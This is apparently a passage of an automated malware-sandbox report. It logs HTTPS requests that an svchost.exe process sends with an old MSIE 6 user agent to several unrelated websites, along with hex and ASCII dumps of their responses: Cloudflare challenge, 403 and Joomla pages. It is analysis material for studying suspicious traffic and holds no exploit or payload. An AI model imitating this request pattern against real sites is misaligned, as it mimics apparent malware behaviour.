                                                                                                                                                                                                                                                                        Data Ascii: th,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img cl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC663INData Raw: 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 31 48 62 32 51 53 6a 39 58 77 41 6c 42 52 59 6f 6e 41 46 77 57 32 72 49 6e 54 72 43 57 6c 42 61 4f 32 41 54 36 44 2e 44 6c 4e 67 2d 31 36 37 38 34 33 31 33 37 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 76 5f 69 54 51 6c 52 72 49 53 4c 52 69 6b 4d 31 4c 69 66 59 38 33 68 73 4f 49 56 4e 30 4b 50 4b 57 52 6b 44 6e 45 58 67 71 72 4d 2d 31 36 37 38 34 33 31 33 37 36 2d 30 2d
                                                                                                                                                                                                                                                                        Data Ascii: n="/?__cf_chl_f_tk=1Hb2QSj9XwAlBRYonAFwW2rInTrCWlBaO2AT6D.DlNg-1678431376-0-gaNycGzNCRA" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="v_iTQlRrISLRikM1LifY83hsOIVN0KPKWRkDnEXgqrM-1678431376-0-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC664INData Raw: 57 58 65 2d 30 78 59 4c 37 6b 67 4c 67 39 6e 63 63 67 52 74 47 71 38 70 68 59 6c 50 74 77 56 58 31 52 2d 58 37 34 70 7a 76 33 45 64 34 67 6c 74 54 76 55 31 53 79 6d 47 32 6a 67 6b 74 64 43 38 61 37 39 78 5f 51 54 4b 70 34 4b 5f 74 6f 4c 56 6d 78 44 4a 62 64 47 56 74 31 61 5f 52 53 56 43 50 78 30 4c 6d 45 43 41 5f 5a 49 48 58 5f 59 6b 35 43 51 74 67 39 6b 66 7a 6e 71 74 72 43 4a 4c 35 42 7a 67 72 45 4d 41 53 47 64 6d 61 6b 64 77 4e 72 76 4c 62 78 31 53 56 6f 76 37 54 57 49 74 71 58 58 66 75 37 4c 42 48 75 55 50 61 58 58 77 72 71 4e 44 4c 61 35 6c 56 57 76 59 6a 5a 7a 71 55 73 44 4f 63 5a 4c 70 61 6c 45 6a 2d 6a 4f 78 6d 44 4e 76 34 65 2d 6d 63 56 46 44 50 4a 68 64 4b 56 64 54 64 62 4a 71 4a 31 67 50 43 32 65 47 76 74 47 46 30 49 4c 30 6b 4c 52 62 38 67 57
                                                                                                                                                                                                                                                                        Data Ascii: WXe-0xYL7kgLg9nccgRtGq8phYlPtwVX1R-X74pzv3Ed4gltTvU1SymG2jgktdC8a79x_QTKp4K_toLVmxDJbdGVt1a_RSVCPx0LmECA_ZIHX_Yk5CQtg9kfznqtrCJL5BzgrEMASGdmakdwNrvLbx1SVov7TWItqXXfu7LBHuUPaXXwrqNDLa5lVWvYjZzqUsDOcZLpalEj-jOxmDNv4e-mcVFDPJhdKVdTdbJqJ1gPC2eGvtGF0IL0kLRb8gW
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC666INData Raw: 61 79 3a 20 27 37 61 35 39 61 38 32 36 37 64 64 36 39 61 33 35 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 37 37 62 31 61 33 35 66 32 35 31 39 33 65 63 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 31 48 62 32 51 53 6a 39 58 77 41 6c 42 52 59 6f 6e 41 46 77 57 32 72 49 6e 54 72 43 57 6c 42 61 4f 32 41 54 36 44 2e 44 6c 4e 67 2d 31 36 37 38 34 33 31 33 37 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: ay: '7a59a8267dd69a35', cHash: '77b1a35f25193ec', cUPMDTk: "\/?__cf_chl_tk=1Hb2QSj9XwAlBRYonAFwW2rInTrCWlBaO2AT6D.DlNg-1678431376-0-gaNycGzNCRA", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC667INData Raw: 59 34 6f 43 70 5a 65 6c 59 65 43 77 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 6b 4b 4d 4d 6c 55 41 2f 49 70 58 69 4a 4d 6b 4c 4d 58 55 59 37 77 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c 37 73 6b
                                                                                                                                                                                                                                                                        Data Ascii: Y4oCpZelYeCw==', i2: 'kKMMlUA/IpXiJMkLMXUY7w==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL7sk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC668INData Raw: 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66
                                                                                                                                                                                                                                                                        Data Ascii: UHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="contentinf
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC669INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        42192.168.2.654841138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC660OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC669INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC669INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        43192.168.2.654839185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC670OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC670INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC671INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        44192.168.2.654895104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC670OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                        Cookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC725INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yFEYUz98wBC9DpHKM54h0X0q890F4S9JvhUz8icU1gu7cl%2BIaJ3lMl3Cr%2ByQ%2FVPHqF%2FeEsBRiezdqwV94L%2BUrK2%2FA5rBzJHuF1K6D0LKYDMITTi2kJZXCuSGejgULTxoDZqn12cNWDo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a82739699a24-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC726INData Raw: 37 63 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                        Data Ascii: 7cab<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC726INData Raw: 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65
                                                                                                                                                                                                                                                                        Data Ascii: les/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/te
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC727INData Raw: 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74
                                                                                                                                                                                                                                                                        Data Ascii: m/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/boot
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC729INData Raw: 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                        Data Ascii: /users/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC730INData Raw: 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e
                                                                                                                                                                                                                                                                        Data Ascii: ck size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC731INData Raw: 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c
                                                                                                                                                                                                                                                                        Data Ascii: -item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"> <span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><l
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC733INData Raw: 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e
                                                                                                                                                                                                                                                                        Data Ascii: /li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <span class="g-separator g-menu-item-content"> <span class="g-men
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC734INData Raw: 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69
                                                                                                                                                                                                                                                                        Data Ascii: s="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-i
